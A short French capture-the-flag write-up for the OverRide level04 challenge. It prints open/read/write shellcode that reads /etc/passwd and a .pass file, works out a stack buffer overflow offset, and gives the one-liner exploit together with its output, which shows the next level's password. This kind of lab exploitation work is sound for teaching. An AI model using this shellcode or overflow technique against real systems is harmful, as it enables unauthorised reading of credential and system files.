Creattion du source ! Fuck ....


Le child nous demande un shellcode.
Il ya du ptrace et une comparaison avec 11 ! Donc on ne peut pas faire de exec

Donc j'ai trouve un shellcode OPEN, READ, WRITE !

http://shell-storm.org/shellcode/files/shellcode-73.php


"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x32\x5b\xb0\x05\x31\xc9\xcd\x80\x89\xc6\xeb\x06\xb0\x01\x31\xdb\xcd\x80\x89\xf3\xb0\x03\x83\xec\x01\x8d\x0c\x24\xb2\x01\xcd\x80\x31\xdb\x39\xc3\x74\xe6\xb0\x04\xb3\x01\xb2\x01\xcd\x80\x83\xc4\x01\xeb\xdf\xe8\xc9\xff\xff\xff/etc/passwd"


Maintenant que nous avons notre shellcode, il faut calculer l'offset du buuferoverflow

buffer 	= esp + 0x20
$ebp	= esp + 0xb0 + 0x8
EIP	= esp + 0xb0 + 0x8 + 0x4


offset	= 0xb0 + 0x8 + 0x4 - 0x20 = 0x9c

OFFSET = 0x9c + 0x4 (pour ecraser EIP)


level04@OverRide:~$ export EXPLOIT=$(python -c 'print "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x32\x5b\xb0\x05\x31\xc9\xcd\x80\x89\xc6\xeb\x06\xb0\x01\x31\xdb\xcd\x80\x89\xf3\xb0\x03\x83\xec\x01\x8d\x0c\x24\xb2\x01\xcd\x80\x31\xdb\x39\xc3\x74\xe6\xb0\x04\xb3\x01\xb2\x01\xcd\x80\x83\xc4\x01\xeb\xdf\xe8\xc9\xff\xff\xff/home/users/level05/.pass"')

level04@OverRide:~$ ./getenvaddr EXPLOIT ./level04
EXPLOIT will be at 0xffffd876

level04@OverRide:~$ (python -c 'print "A"*0x9c + "\x76\xd8\xff\xff"') | ./level04
Give me some shellcode, k
3v8QLcN5SAhPaZZfEasfmXdwyR59ktDEMAwHF3aN
child is exiting...

